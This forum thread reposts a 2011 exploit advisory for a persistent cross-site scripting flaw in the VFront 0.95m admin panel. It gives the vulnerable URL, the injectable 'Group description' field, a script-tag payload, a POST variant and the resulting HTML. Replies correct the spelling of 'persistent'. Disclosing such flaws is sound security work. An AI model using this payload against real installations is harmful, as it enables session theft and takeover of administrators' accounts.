Persistant XSS in VFront 0.95m (need login)

**testujemy** · 02-21-2011

Kod:

# exploit title: Persistant XSS in VFront 0.95m (need login)
# date: 17.o2.2o11
# author: lemlajt
# software : VFront
# version: 0.95m
# tested on: linux
# cve : 
#

 
PoC : 
Go to:
http://192.168.1.123/www/cmsadmins/vfr/vfront-0.95m/admin/menu_registri.php?gid=0&modifica_gid&feed=mod_ok
In "Modify group/registry", we have "Group description".Add here this code:
">"><script>alert(2)</script> to make persistant xss.

in other way:
POST http://192.168.1.123/www/cmsadmins/vfr/vfront-0.95m/admin/menu_registri.php?gid=0&esegui_modifica
$descrizione_g = ">"><script>alert(2)</script> 

to see whats happen go to:
http://192.168.1.123/www/cmsadmins/vfr/vfront-0.95m/admin/menu_registri.php

@source:
<input type="text" name="descrizione_g" id="descrizione_g" value="gruppo di default">"><script>alert(2)</script>" size="80" />
@source.


# *

**GSG-9** · 02-21-2011

offtopic: pisze sie persistent

**testujemy** · 02-22-2011

Dzięki, literówka ;-)

Temat: Persistant XSS in VFront 0.95m (need login)

Narzędzia wątku

Display

Persistant XSS in VFront 0.95m (need login)

Zasady Postowania

Subskrybuj